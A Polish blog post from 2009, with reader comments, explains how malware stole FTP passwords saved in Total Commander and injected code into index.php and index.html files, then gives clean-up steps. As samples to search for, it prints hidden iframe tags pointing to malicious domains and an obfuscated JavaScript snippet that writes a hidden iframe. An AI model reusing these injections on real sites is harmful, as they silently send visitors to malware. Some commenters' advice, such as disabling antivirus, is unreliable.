Ostatnimi czasy coraz więcej klientów / ludzi “skarży” się na wirusy na swoich stronach internetowych – nie są to typowe “wirusy” a “po prostu” kawałek kodu źródłowego, który dopisuje się do plików index.php, index.html … itd
Pewnie zastanawia to Państwa jakim cudem się ten wirus dostał się na stronę?
Więc jest to powodem zawirusowanego systemu operacyjnego i zawartego hasła do serwera FTP w programie Total Commander, który niestety jest podatny na tego typu zabieg. Wirus sprawdza wszystkie konta FTP zapisane w programie i jeżeli ma możliwość zalogować się na daną stronę , loguje się a następnie wyszukuje typowe nazwy plików (np. index.php, index.html … ) i na końcu kodu dopisuje kilka linijek swojego kodu, który raz ma postać <iframe> a innym razem jako zaawansowany kawałek kodu JavaScript.
W wynikach wyszukiwania Google, często można znaleźć strony przy który jest napisane “Ta witryna może wyrządzić szkody na twoim komputerze” to oznacza, że dana strona właśnie posiada dopisany tego typu kod.
Jak usunąć tego wirusa?
- Po pierwsze i najważniejsze – od razu zmienić hasło do serwera FTP i nie zapisywać go w Total Commanderze (najlepiej go podawać podczas logowania, bądź po prostu skorzystać z innego oprogramowania, które jest wiele…)
- Zalogować się na serwer FTP i skopiować wszystkie pliki na swój lokalny dysk (komputer)
- Lokalnie na komputerze przeglądnąć wszystkie pliki poszukując kodu pokroju:
<iframe src=”http://mixante.cn/in.cgi?income55″ width=1 height=1 style=”visibility: hidden”></iframe>
<iframe src=”http://cheapslotplay.cn/in.cgi?income48″ width=1 height=1 style=”visibility: hidden”></iframe>
… itd
Zależność jest jedna – wyraz – “income” i w poszukiwaniu takiego wyrazu na początek zalecamy się skupić, gdy tylko znajdą Państwo tego typu kod, należy go usunąć i wgrać plik na serwer FTP nadpisując stary.
Drugim rodzajem “wirusa” może być kod podobny do:
<!– ad –><script>
uyimh=687;
qxcxg=4804;
ddytx=7948;
xkjpv=”write”;
mzsrv=”me”;
zqfqw=”et”;
gdtrk=”/’ st”;
rpiia=”yl”;
qxaol=”";
ldlvw=”i”;
zfhuu=”ty”;
hvkhb=”:h”;
hbqmm=”d”;
hauzn=”";
zdqdp=4;
sjgbi=”if”;
rpygo=”r”;
syjnh=” sr”;
rwanv=”c”;
elujl=”=”;
hrgnc=863;
akzpp=8853;
tplxn=” “;
cvtot=”</”;
qtndm=”";
jlooz=3953;
uyimh=687;
qxcxg=4804;
ddytx=7948;
xkjpv=”write”;
mzsrv=”me”;
zqfqw=”et”;
gdtrk=”/’ st”;
rpiia=”yl”;
qxaol=”";
ldlvw=”i”;
zfhuu=”ty”;
hvkhb=”:h”;
hbqmm=”d”;
hauzn=”";
zdqdp=4;
sjgbi=”if”;
rpygo=”r”;
syjnh=” sr”;
rwanv=”c”;
elujl=”=”;
hrgnc=863;
akzpp=8853;
tplxn=” “;
cvtot=”</”;
qtndm=”";
jlooz=3953;
gftzo=(9.007e3>=5e1?uyimh:qxcxg);
jjaqh=(ddytx>.2438?xkjpv:3.);
gmbpt=(7.3e1>=36?mzsrv:.45);
zxtsi=(323,zqfqw+gdtrk+rpiia+”e=’”+”v”+”isib”);
hzpmf=(0×587,qxaol+ldlvw+”li”+zfhuu+hvkhb+”id”+hbqmm+”en”+”‘”+hauzn);
rmtyf=(6.5e1,”");aaa=((567,gftzo),(0×2,document))[((0.3,2.46e2)>=(17,7918.)?(5249.>=0.8188?0x816:.5486)
.2717<=.77?jjaqh:0x14))](((zdqdp,2.),(0.591,”"+”<”+sjgbi+rpygo+”a”)+(82,gmbpt)+(0.1301,syjnh+rwanv+elujl+”‘”+”h”+”ttp”+”")+(8581.<.887?0.7:”://t”+”ruittbros.n”)+(476,zxtsi)+(hrgnc>=akzpp?9.909e3:hzpmf)+(69<38.?0.249:tplxn+”>”+cvtot+”if”+qtndm)+(2.>1.?”ram”+”e>”:64.)+(223.>=jlooz?1.:rmtyf)));</script><!– /ad –><!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
Proszę mieć na uwadze, że to w żadnym przypadku nie jest wina hostingu, obojętnie czy to będzie nazwa.pl, home.pl czy inna firma hostingowa (aczkolwiek istnieją skrajne przypadki…).
Po usunięciu w/w kodów i wgraniu ich na serwer FTP strona powinna być już odkażona 
W razie problemów (czy też braku umiejętności) z usunięciem wirusa, zapraszamy do kontaktu z nami.
Sierpień 3rd, 2009 at 9:33 am
mam dokładnie ten problem na kilku moich stronach, uzywalem total commandera i na prawie wszystkich jest wirus
mam problem jak to usunąć, gdy chce ściagnac index.html albo index.php antywirus krzyczy ze to niebezpieczne i odrazu usuwa ten plik
czy jest niebezpiecznym wylaczenie antywirusa na czas przeszukania kodu. czy ten kod moze zrobic cos nie tylko ze stroną www ale i z moim komputerem?
Sierpień 3rd, 2009 at 9:51 am
Na spokojnie możesz wyłączyć antywirusa na czas usuwania wirusa z pliku.
Polecam Ci dodatkowo zmienić Total Commandera na innego klienta FTP.
Sierpień 3rd, 2009 at 10:26 am
zmienilem juz klienta ftp
na stronach ktore mialem zrobione w html-u
wystarczyla podmiana zdrowych plikow index.html i zmiana hasla ftp
mam jednak problem ze zlokalizowaniem wirusa w cmsie extreme-fusion
co mam zrobic?
Sierpień 3rd, 2009 at 1:38 pm
Zobacz może w katalogu z template’ami
Sierpień 3rd, 2009 at 9:58 pm
poradzilem sobie!
w moim nowym kliencie ftp ustawilem kolejnosc pokazywania plików na ostatnio modyfikowane
okazało sie ze ostatnio modyfikowane przeze mnie pliki były w modtfikowane na przełomie stycznia i lutego tymczasem zauwazylem ze ktos modyfikowal je w poznych porach nocnych i wczesno rannych pod koniec lipca
zainteresowalo mnie to i zacząlem grzebac w kodzie (jezeli komus nie powiedzie sie sciagniecie zainfekowanego pliku prosze zmienic jego rozszerzenie z .html lub .php na .txt wtedy powinno pojsc gładko)
okazało sie ze we wszystkich plikach w ktorych byla fraza index (a w cms-ie jest ich duzo,bo w poszczegolnych folderach jest chociaz jeden) był wsztrzykniety kod framein tzn taki jak pokazany jest powyzej tylko ze z jakiejs ruskiej domeny(BURRAKI!!!)
usunalem ten kod, a troche tego bylo i gra gitara!! dla 15-latka to nie lada sukces!
Sierpień 12th, 2009 at 12:55 pm
Wymień klienta FTP z TC na FileZille. Na czas usuwania kodu z pliku index możesz wyłączyć program antywirusowy. Jeśli dostałeś filtr od google to strona powinna wrócić na swoje miejsce po ponownym przeindeksowaniu jeśli jest “czysta” – jeśli nie wraca napisz do google prośbę o przywrócenie strony.
Styczeń 27th, 2010 at 11:05 pm
Witam,
a czy jest możliwe, że takowy wirus zmieni jakoś hasło do użytkownika ftp?
Styczeń 28th, 2010 at 10:31 am
Witaj,
Jest to raczej nie możliwe, gdyż wszystkie dane do konta ftp. są zapisane i chronione przez firmę hostingową.
Luty 5th, 2010 at 7:22 am
Witam, posiadam stronę na której antywirus (Avats, Nod) wykrywają wirusa. Wyświetla komunikat:
Obiekt:
http://nazwa-strony.pl/templates/nazwa-szablonu/css/js/addons...
Zagrożenie: HTML/iframe/C.Gen.wirus
Informacje: połączenie zakończone -poddany kwarantanie.
Wszystko ładnie piękne ale nie mogę znaleźć żadnego pliku pod nazwą “addons…”
Co robić ?
Luty 6th, 2010 at 10:21 pm
Witam, mam problem nie wiem jak poradzić sobie z tym wirusem. Używam filezille.
Antywirus (Nod) wyświetla komunikat że w folderze templates -> css – > js i plik addons… jest wirus iframe. Pliku addons nie mogę nigdzie znaleźć. Pomóżcie
Luty 8th, 2010 at 12:56 pm
Przeszukaj folder z templatką
Luty 13th, 2010 at 5:11 pm
Mam podobny problem. Ludzie mówią mi, że na stronach pisanych przeze mnie są wirusy, ale mój antywirus (avira) nic nie melduje. Nie wiem, jakich programów używają, ani jakie komunikaty im się pokazują. Google nic nie zaznacza przy wyszukiwaniu stron. Czy możliwe, że antywirus się myli – jak sprawdzić: mój czy innych? Przejrzałam kilka plików .index.php, index. html, ale nie znalazłam dopisanego kodu. Co mam robić? Proszę o pomoc.
Luty 19th, 2010 at 10:58 pm
mój antyvir “avira” ostrzega mnie przed wirusem na moje stronie http://www.litwin.freehost.pl/galeria/galeria.htm , okazało się , ze doklejany tam jest kod iframe, po próbach wczytywania na serwer nowej strony itd. spróbowąłem wrzucić cała nową czysta stronę pod inny adres tej samej firmy hostingowej
http://www.litwin.piwko.pl/galeria/galeria.htm
wirus również został doklejony
jednak po wrzuceniu strony na serwer innej darmowej firmy strona jest czysta :
http://www.fotobiznes.yoyo.pl/galeria/galeria.htm
w korespondencji z firmą freehost otrzyamłem odpowiedź , ze za darmowy serwer oni nie odpowiadają…
takwiec niestety jest to wina hostingu.